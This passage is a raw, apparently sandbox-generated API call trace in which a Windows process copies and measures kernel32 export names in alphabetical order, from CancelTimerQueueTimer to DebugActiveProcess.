lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0081.436] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0081.436] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0081.436] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0081.436] lstrlenA (lpString="CHECKELEVATION") returned 14 [0081.436] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0081.436] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0081.437] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0081.437] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0081.437] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0081.437] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0081.437] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0081.437] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0081.437] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0081.437] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0081.437] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0081.437] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0081.437] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0081.437] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0081.437] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0081.437] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0081.438] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0081.438] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0081.438] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0081.438] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0081.438] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0081.438] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0081.438] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0081.438] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0081.438] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0081.438] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0081.438] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0081.438] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0081.438] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0081.438] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0081.438] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0081.438] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0081.438] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0081.438] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0081.438] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0081.439] lstrlenA (lpString="COPYCONTEXT") returned 11 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0081.439] lstrlenA (lpString="COPYFILEA") returned 9 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0081.439] lstrlenA (lpString="COPYFILEEXA") returned 11 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0081.439] lstrlenA (lpString="COPYFILEEXW") returned 11 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0081.439] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0081.439] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0081.439] lstrlenA (lpString="COPYFILEW") returned 9 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0081.439] lstrlenA (lpString="COPYLZFILE") returned 10 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0081.439] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0081.439] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0081.439] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.439] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.439] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.439] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.439] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.439] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.439] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.439] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.439] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.440] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.440] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.440] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.440] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.440] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.440] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.440] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.440] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.440] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.440] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.440] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.440] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.440] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.440] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.440] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.440] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.440] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.441] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.441] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.441] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.441] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.441] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.441] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.441] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.441] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.441] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.441] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.441] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.441] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.441] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.441] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.441] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.441] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.441] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.441] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.441] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.442] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.442] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.442] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.442] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.442] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.442] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.442] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.442] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.442] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.442] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.442] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.442] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.442] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.442] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.442] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.442] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.442] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.442] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.442] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.442] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.443] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.443] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.443] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.443] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.443] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.443] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.443] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.443] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.443] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.443] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.443] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.443] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.443] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.443] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.443] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.443] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") 